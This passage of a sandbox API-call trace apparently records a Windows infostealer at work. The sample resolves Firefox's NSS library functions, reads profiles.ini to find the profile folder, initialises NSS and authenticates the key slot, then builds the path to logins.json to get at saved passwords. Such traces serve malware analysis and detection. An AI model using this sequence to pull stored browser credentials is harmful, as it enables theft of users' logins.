lstrcmpA (lpString1="CERT_FreeNicknames", lpString2="NSS_Init") returned -1 [0206.656] lstrcmpA (lpString1="CERT_GenTime2FormattedAscii", lpString2="NSS_Init") returned -1 [0206.656] lstrcmpA (lpString1="CERT_GenTime2FormattedAscii_Util", lpString2="NSS_Init") returned -1 [0206.656] lstrcmpA (lpString1="CERT_GetAVATag", lpString2="NSS_Init") returned -1 [0206.656] lstrcmpA (lpString1="CERT_GetCertChainFromCert", lpString2="NSS_Init") returned -1 [0206.656] lstrcmpA (lpString1="CERT_GetCertEmailAddress", lpString2="NSS_Init") returned -1 [0206.656] lstrcmpA (lpString1="CERT_GetCertIssuerAndSN", lpString2="NSS_Init") returned -1 [0206.656] lstrcmpA (lpString1="CERT_GetCertNicknames", lpString2="NSS_Init") returned -1 [0206.656] lstrcmpA (lpString1="CERT_GetCertTimes", lpString2="NSS_Init") returned -1 [0206.656] lstrcmpA (lpString1="CERT_GetCertTrust", lpString2="NSS_Init") returned -1 [0206.656] lstrcmpA (lpString1="CERT_GetCertUid", lpString2="NSS_Init") returned -1 [0206.656] lstrcmpA (lpString1="CERT_GetCertificateNames", lpString2="NSS_Init") returned -1 [0206.656] lstrcmpA (lpString1="CERT_GetCertificateRequestExtensions", lpString2="NSS_Init") returned -1 [0206.656] lstrcmpA (lpString1="CERT_GetClassicOCSPDisabledPolicy", lpString2="NSS_Init") returned -1 [0206.656] lstrcmpA (lpString1="CERT_GetClassicOCSPEnabledHardFailurePolicy", lpString2="NSS_Init") returned -1 [0206.656] lstrcmpA (lpString1="CERT_GetClassicOCSPEnabledSoftFailurePolicy", lpString2="NSS_Init") returned -1 [0206.656] lstrcmpA (lpString1="CERT_GetCommonName", lpString2="NSS_Init") returned -1 [0206.656] lstrcmpA (lpString1="CERT_GetConstrainedCertificateNames", lpString2="NSS_Init") returned -1 [0206.656] lstrcmpA (lpString1="CERT_GetCountryName", lpString2="NSS_Init") returned -1 [0206.656] lstrcmpA (lpString1="CERT_GetDBContentVersion", lpString2="NSS_Init") returned -1 [0206.656] lstrcmpA (lpString1="CERT_GetDefaultCertDB", lpString2="NSS_Init") returned -1 [0206.656] lstrcmpA (lpString1="CERT_GetDomainComponentName", lpString2="NSS_Init") returned -1 [0206.656] lstrcmpA (lpString1="CERT_GetEncodedOCSPResponse", lpString2="NSS_Init") returned -1 [0206.656] lstrcmpA (lpString1="CERT_GetFirstEmailAddress", lpString2="NSS_Init") returned -1 [0206.657] lstrcmpA (lpString1="CERT_GetLocalityName", lpString2="NSS_Init") returned -1 [0206.657] lstrcmpA (lpString1="CERT_GetNextEmailAddress", lpString2="NSS_Init") returned -1 [0206.657] lstrcmpA (lpString1="CERT_GetNextGeneralName", lpString2="NSS_Init") returned -1 [0206.657] lstrcmpA (lpString1="CERT_GetNextNameConstraint", lpString2="NSS_Init") returned -1 [0206.657] lstrcmpA (lpString1="CERT_GetOCSPAuthorityInfoAccessLocation", lpString2="NSS_Init") returned -1 [0206.657] lstrcmpA (lpString1="CERT_GetOCSPResponseStatus", lpString2="NSS_Init") returned -1 [0206.657] lstrcmpA (lpString1="CERT_GetOCSPStatusForCertID", lpString2="NSS_Init") returned -1 [0206.657] lstrcmpA (lpString1="CERT_GetOidString", lpString2="NSS_Init") returned -1 [0206.657] lstrcmpA (lpString1="CERT_GetOrgName", lpString2="NSS_Init") returned -1 [0206.657] lstrcmpA (lpString1="CERT_GetOrgUnitName", lpString2="NSS_Init") returned -1 [0206.657] lstrcmpA (lpString1="CERT_GetPKIXVerifyNistRevocationPolicy", lpString2="NSS_Init") returned -1 [0206.657] lstrcmpA (lpString1="CERT_GetPrevGeneralName", lpString2="NSS_Init") returned -1 [0206.657] lstrcmpA (lpString1="CERT_GetPrevNameConstraint", lpString2="NSS_Init") returned -1 [0206.657] lstrcmpA (lpString1="CERT_GetSSLCACerts", lpString2="NSS_Init") returned -1 [0206.657] lstrcmpA (lpString1="CERT_GetSlopTime", lpString2="NSS_Init") returned -1 [0206.657] lstrcmpA (lpString1="CERT_GetStateName", lpString2="NSS_Init") returned -1 [0206.657] lstrcmpA (lpString1="CERT_GetUsePKIXForValidation", lpString2="NSS_Init") returned -1 [0206.657] lstrcmpA (lpString1="CERT_GetValidDNSPatternsFromCert", lpString2="NSS_Init") returned -1 [0206.657] lstrcmpA (lpString1="CERT_Hexify", lpString2="NSS_Init") returned -1 [0206.657] lstrcmpA (lpString1="CERT_ImportCAChain", lpString2="NSS_Init") returned -1 [0206.657] lstrcmpA (lpString1="CERT_ImportCAChainTrusted", lpString2="NSS_Init") returned -1 [0206.657] lstrcmpA (lpString1="CERT_ImportCRL", lpString2="NSS_Init") returned -1 [0206.657] lstrcmpA (lpString1="CERT_ImportCerts", lpString2="NSS_Init") returned -1 [0206.657] lstrcmpA (lpString1="CERT_IsCACert", lpString2="NSS_Init") returned -1 [0206.657] lstrcmpA (lpString1="CERT_IsCADERCert", lpString2="NSS_Init") returned -1 [0206.657] lstrcmpA (lpString1="CERT_IsRootDERCert", lpString2="NSS_Init") returned -1 [0206.657] lstrcmpA (lpString1="CERT_IsUserCert", lpString2="NSS_Init") returned -1 [0206.657] lstrcmpA (lpString1="CERT_KeyFromDERCrl", lpString2="NSS_Init") returned -1 [0206.657] lstrcmpA (lpString1="CERT_MakeCANickname", lpString2="NSS_Init") returned -1 [0206.657] lstrcmpA (lpString1="CERT_MergeExtensions", lpString2="NSS_Init") returned -1 [0206.657] lstrcmpA (lpString1="CERT_NameToAscii", lpString2="NSS_Init") returned -1 [0206.657] lstrcmpA (lpString1="CERT_NameToAsciiInvertible", lpString2="NSS_Init") returned -1 [0206.657] lstrcmpA (lpString1="CERT_NewCertList", lpString2="NSS_Init") returned -1 [0206.657] lstrcmpA (lpString1="CERT_NewTempCertificate", lpString2="NSS_Init") returned -1 [0206.657] lstrcmpA (lpString1="CERT_NicknameStringsFromCertList", lpString2="NSS_Init") returned -1 [0206.657] lstrcmpA (lpString1="CERT_OCSPCacheSettings", lpString2="NSS_Init") returned -1 [0206.658] lstrcmpA (lpString1="CERT_OpenCertDBFilename", lpString2="NSS_Init") returned -1 [0206.658] lstrcmpA (lpString1="CERT_PKIXVerifyCert", lpString2="NSS_Init") returned -1 [0206.658] lstrcmpA (lpString1="CERT_PostOCSPRequest", lpString2="NSS_Init") returned -1 [0206.658] lstrcmpA (lpString1="CERT_RFC1485_EscapeAndQuote", lpString2="NSS_Init") returned -1 [0206.658] lstrcmpA (lpString1="CERT_RegisterAlternateOCSPAIAInfoCallBack", lpString2="NSS_Init") returned -1 [0206.658] lstrcmpA (lpString1="CERT_RemoveCertListNode", lpString2="NSS_Init") returned -1 [0206.658] lstrcmpA (lpString1="CERT_SaveSMimeProfile", lpString2="NSS_Init") returned -1 [0206.658] lstrcmpA (lpString1="CERT_SetOCSPDefaultResponder", lpString2="NSS_Init") returned -1 [0206.658] lstrcmpA (lpString1="CERT_SetOCSPFailureMode", lpString2="NSS_Init") returned -1 [0206.658] lstrcmpA (lpString1="CERT_SetOCSPTimeout", lpString2="NSS_Init") returned -1 [0206.658] lstrcmpA (lpString1="CERT_SetSlopTime", lpString2="NSS_Init") returned -1 [0206.658] lstrcmpA (lpString1="CERT_SetUsePKIXForValidation", lpString2="NSS_Init") returned -1 [0206.658] lstrcmpA (lpString1="CERT_StartCRLEntryExtensions", lpString2="NSS_Init") returned -1 [0206.658] lstrcmpA (lpString1="CERT_StartCRLExtensions", lpString2="NSS_Init") returned -1 [0206.658] lstrcmpA (lpString1="CERT_StartCertExtensions", lpString2="NSS_Init") returned -1 [0206.658] lstrcmpA (lpString1="CERT_StartCertificateRequestAttributes", lpString2="NSS_Init") returned -1 [0206.658] lstrcmpA (lpString1="CERT_UncacheCRL", lpString2="NSS_Init") returned -1 [0206.658] lstrcmpA (lpString1="CERT_VerifyCACertForUsage", lpString2="NSS_Init") returned -1 [0206.658] lstrcmpA (lpString1="CERT_VerifyCert", lpString2="NSS_Init") returned -1 [0206.658] lstrcmpA (lpString1="CERT_VerifyCertName", lpString2="NSS_Init") returned -1 [0206.658] lstrcmpA (lpString1="CERT_VerifyCertNow", lpString2="NSS_Init") returned -1 [0206.658] lstrcmpA (lpString1="CERT_VerifyCertificate", lpString2="NSS_Init") returned -1 [0206.658] lstrcmpA (lpString1="CERT_VerifyCertificateNow", lpString2="NSS_Init") returned -1 [0206.660] lstrcmpA (lpString1="CERT_VerifyOCSPResponseSignature", lpString2="NSS_Init") returned -1 [0206.660] lstrcmpA (lpString1="CERT_VerifySignedData", lpString2="NSS_Init") returned -1 [0206.660] lstrcmpA (lpString1="CERT_VerifySignedDataWithPublicKey", lpString2="NSS_Init") returned -1 [0206.660] lstrcmpA (lpString1="CERT_VerifySignedDataWithPublicKeyInfo", lpString2="NSS_Init") returned -1 [0206.660] lstrcmpA (lpString1="DER_AsciiToTime", lpString2="NSS_Init") returned -1 [0206.660] lstrcmpA (lpString1="DER_AsciiToTime_Util", lpString2="NSS_Init") returned -1 [0206.660] lstrcmpA (lpString1="DER_DecodeTimeChoice", lpString2="NSS_Init") returned -1 [0206.660] lstrcmpA (lpString1="DER_DecodeTimeChoice_Util", lpString2="NSS_Init") returned -1 [0206.660] lstrcmpA (lpString1="DER_Encode", lpString2="NSS_Init") returned -1 [0206.660] lstrcmpA (lpString1="DER_EncodeTimeChoice", lpString2="NSS_Init") returned -1 [0206.660] lstrcmpA (lpString1="DER_EncodeTimeChoice_Util", lpString2="NSS_Init") returned -1 [0206.660] lstrcmpA (lpString1="DER_Encode_Util", lpString2="NSS_Init") returned -1 [0206.660] lstrcmpA (lpString1="DER_GeneralizedDayToAscii", lpString2="NSS_Init") returned -1 [0206.660] lstrcmpA (lpString1="DER_GeneralizedDayToAscii_Util", lpString2="NSS_Init") returned -1 [0206.660] lstrcmpA (lpString1="DER_GeneralizedTimeToTime", lpString2="NSS_Init") returned -1 [0206.660] lstrcmpA (lpString1="DER_GeneralizedTimeToTime_Util", lpString2="NSS_Init") returned -1 [0206.660] lstrcmpA (lpString1="DER_GetInteger", lpString2="NSS_Init") returned -1 [0206.660] lstrcmpA (lpString1="DER_GetInteger_Util", lpString2="NSS_Init") returned -1 [0206.660] lstrcmpA (lpString1="DER_GetUInteger", lpString2="NSS_Init") returned -1 [0206.660] lstrcmpA (lpString1="DER_LengthLength", lpString2="NSS_Init") returned -1 [0206.660] lstrcmpA (lpString1="DER_Lengths", lpString2="NSS_Init") returned -1 [0206.660] lstrcmpA (lpString1="DER_Lengths_Util", lpString2="NSS_Init") returned -1 [0206.660] lstrcmpA (lpString1="DER_SetUInteger", lpString2="NSS_Init") returned -1 [0206.660] lstrcmpA (lpString1="DER_StoreHeader", lpString2="NSS_Init") returned -1 [0206.660] lstrcmpA (lpString1="DER_TimeChoiceDayToAscii", lpString2="NSS_Init") returned -1 [0206.660] lstrcmpA (lpString1="DER_TimeChoiceDayToAscii_Util", lpString2="NSS_Init") returned -1 [0206.660] lstrcmpA (lpString1="DER_TimeToGeneralizedTime", lpString2="NSS_Init") returned -1 [0206.661] lstrcmpA (lpString1="DER_TimeToGeneralizedTimeArena", lpString2="NSS_Init") returned -1 [0206.661] lstrcmpA (lpString1="DER_TimeToGeneralizedTimeArena_Util", lpString2="NSS_Init") returned -1 [0206.661] lstrcmpA (lpString1="DER_TimeToGeneralizedTime_Util", lpString2="NSS_Init") returned -1 [0206.661] lstrcmpA (lpString1="DER_TimeToUTCTime", lpString2="NSS_Init") returned -1 [0206.661] lstrcmpA (lpString1="DER_TimeToUTCTime_Util", lpString2="NSS_Init") returned -1 [0206.661] lstrcmpA (lpString1="DER_UTCDayToAscii", lpString2="NSS_Init") returned -1 [0206.663] SetCurrentDirectoryW (lpPathName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 1 [0206.663] VirtualFree (lpAddress=0x2eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.663] lstrlenW (lpString="\\Mozilla\\Firefox\\") returned 17 [0206.663] VirtualAlloc (lpAddress=0x0, dwSize=0x24, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0206.664] lstrlenW (lpString="\\Mozilla\\Firefox\\") returned 17 [0206.664] lstrcpyW (in: lpString1=0x2df0000, lpString2="\\Mozilla\\Firefox\\" | out: lpString1="\\Mozilla\\Firefox\\") returned="\\Mozilla\\Firefox\\" [0206.664] lstrlenW (lpString="\\Mozilla\\Firefox\\") returned 17 [0206.664] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0206.664] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f55c, dwLength=0x1c | out: lpBuffer=0x415f55c*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0206.664] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0206.664] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.665] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\Mozilla\\Firefox\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" [0206.665] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.665] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0206.665] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0206.665] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" [0206.665] lstrlenW (lpString="profiles.ini") returned 12 [0206.665] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0206.666] lstrlenW (lpString="profiles.ini") returned 12 [0206.666] lstrcpyW (in: lpString1=0x2df0000, lpString2="profiles.ini" | out: lpString1="profiles.ini") returned="profiles.ini" [0206.666] lstrlenW (lpString="profiles.ini") returned 12 [0206.666] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0206.666] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f55c, dwLength=0x1c | out: lpBuffer=0x415f55c*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0206.666] VirtualAlloc (lpAddress=0x0, dwSize=0x98, flAllocationType=0x3000, flProtect=0x4) returned 0x2eb0000 [0206.666] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.666] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="profiles.ini" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" [0206.666] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.667] lstrlenW (lpString="Profile") returned 7 [0206.667] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0206.667] lstrlenW (lpString="Profile") returned 7 [0206.667] lstrcpyW (in: lpString1=0x2d80000, lpString2="Profile" | out: lpString1="Profile") returned="Profile" [0206.667] lstrlenW (lpString="Profile") returned 7 [0206.667] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0206.667] lstrcpyW (in: lpString1=0x2df0000, lpString2="Profile" | out: lpString1="Profile") returned="Profile" [0206.667] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.668] wsprintfW (in: param_1=0x415f3ac, param_2="%d" | out: param_1="0") returned 1 [0206.668] lstrlenW (lpString="0") returned 1 [0206.668] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0206.668] lstrlenW (lpString="0") returned 1 [0206.668] lstrcpyW (in: lpString1=0x2d80000, lpString2="0" | out: lpString1="0") returned="0" [0206.668] lstrlenW (lpString="0") returned 1 [0206.668] lstrlenW (lpString="Profile") returned 7 [0206.668] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f354, dwLength=0x1c | out: lpBuffer=0x415f354*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0206.668] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0206.668] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.669] lstrcatW (in: lpString1="Profile", lpString2="0" | out: lpString1="Profile0") returned="Profile0" [0206.669] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.669] GetPrivateProfileStringW (in: lpAppName="Profile0", lpKeyName="Path", lpDefault=0x0, lpReturnedString=0x415f5d0, nSize=0x104, lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" | out: lpReturnedString="Profiles/silmbjec.default") returned 0x19 [0206.675] lstrlenW (lpString="Profile") returned 7 [0206.675] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0206.676] lstrlenW (lpString="Profile") returned 7 [0206.676] lstrcpyW (in: lpString1=0x2d80000, lpString2="Profile" | out: lpString1="Profile") returned="Profile" [0206.676] lstrlenW (lpString="Profile") returned 7 [0206.676] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0206.676] lstrcpyW (in: lpString1=0x2df0000, lpString2="Profile" | out: lpString1="Profile") returned="Profile" [0206.676] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.676] wsprintfW (in: param_1=0x415f3ac, param_2="%d" | out: param_1="1") returned 1 [0206.676] lstrlenW (lpString="1") returned 1 [0206.676] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0206.677] lstrlenW (lpString="1") returned 1 [0206.677] lstrcpyW (in: lpString1=0x2d80000, lpString2="1" | out: lpString1="1") returned="1" [0206.677] lstrlenW (lpString="1") returned 1 [0206.677] lstrlenW (lpString="Profile") returned 7 [0206.677] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f354, dwLength=0x1c | out: lpBuffer=0x415f354*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0206.677] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2f60000 [0206.677] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.677] lstrcatW (in: lpString1="Profile", lpString2="1" | out: lpString1="Profile1") returned="Profile1" [0206.677] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.678] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0206.678] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0206.678] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" [0206.678] lstrlenW (lpString="Profiles/silmbjec.default") returned 25 [0206.678] VirtualAlloc (lpAddress=0x0, dwSize=0x34, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0206.678] lstrlenW (lpString="Profiles/silmbjec.default") returned 25 [0206.678] lstrcpyW (in: lpString1=0x2df0000, lpString2="Profiles/silmbjec.default" | out: lpString1="Profiles/silmbjec.default") returned="Profiles/silmbjec.default" [0206.678] lstrlenW (lpString="Profiles/silmbjec.default") returned 25 [0206.678] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0206.678] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f55c, dwLength=0x1c | out: lpBuffer=0x415f55c*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0206.678] VirtualAlloc (lpAddress=0x0, dwSize=0xb2, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0206.679] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.679] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="Profiles/silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles/silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles/silmbjec.default" [0206.679] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.679] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0206.679] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles/silmbjec.default") returned 87 [0206.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles/silmbjec.default", cchWideChar=87, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 87 [0206.679] VirtualAlloc (lpAddress=0x0, dwSize=0x57, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0206.680] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles/silmbjec.default") returned 87 [0206.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles/silmbjec.default", cchWideChar=87, lpMultiByteStr=0x2df0000, cbMultiByte=87, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles/silmbjec.default", lpUsedDefaultChar=0x0) returned 87 [0206.680] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles/silmbjec.default") returned 87 [0206.680] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles/silmbjec.default") returned 87 [0206.680] VirtualAlloc (lpAddress=0x0, dwSize=0x57, flAllocationType=0x3000, flProtect=0x4) returned 0x2f80000 [0206.680] lstrcpyA (in: lpString1=0x2f80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles/silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles/silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles/silmbjec.default" [0206.680] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.681] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles/silmbjec.default") returned 87 [0206.681] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0206.681] lstrcatA (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles/silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles/silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles/silmbjec.default" [0206.681] VirtualFree (lpAddress=0x2f80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.681] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.683] NSS_Init () returned 0x0 [0207.708] PK11_GetInternalKeySlot () returned 0x482d000 [0207.709] PK11_Authenticate () returned 0x0 [0207.709] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles/silmbjec.default") returned 87 [0207.709] VirtualAlloc (lpAddress=0x0, dwSize=0xb0, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0207.710] lstrcpyW (in: lpString1=0x2df0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles/silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles/silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles/silmbjec.default" [0207.710] lstrlenW (lpString="\\logins.json") returned 12 [0207.710] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x2f80000 [0207.710] lstrlenW (lpString="\\logins.json") returned 12 [0207.710] lstrcpyW (in: lpString1=0x2f80000, lpString2="\\logins.json" | out: lpString1="\\logins.json") returned="\\logins.json" [0207.710] lstrlenW (lpString="\\logins.json") returned 12 [0207.710] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles/silmbjec.default") returned 87 [0207.711] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f55c, dwLength=0x1c | out: lpBuffer=0x415f55c*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0207.711] VirtualAlloc (lpAddress=0x0, dwSize=0xca, flAllocationType=0x3000, flProtect=0x4) returned 0x3110000 [0207.711] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.711] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles/silmbjec.default", lpString2="\\logins.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles/silmbjec.default\\logins.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles/silmbjec.default\\logins.json" [0207.711] VirtualFree (lpAddress=0x2f80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.712] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f3b0, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0207.712] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0207.712] VirtualAlloc (lpAddress=0x0, dwSize=0x5c, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0207.713] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0207.713] lstrcpyW (in: lpString1=0x2df0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") 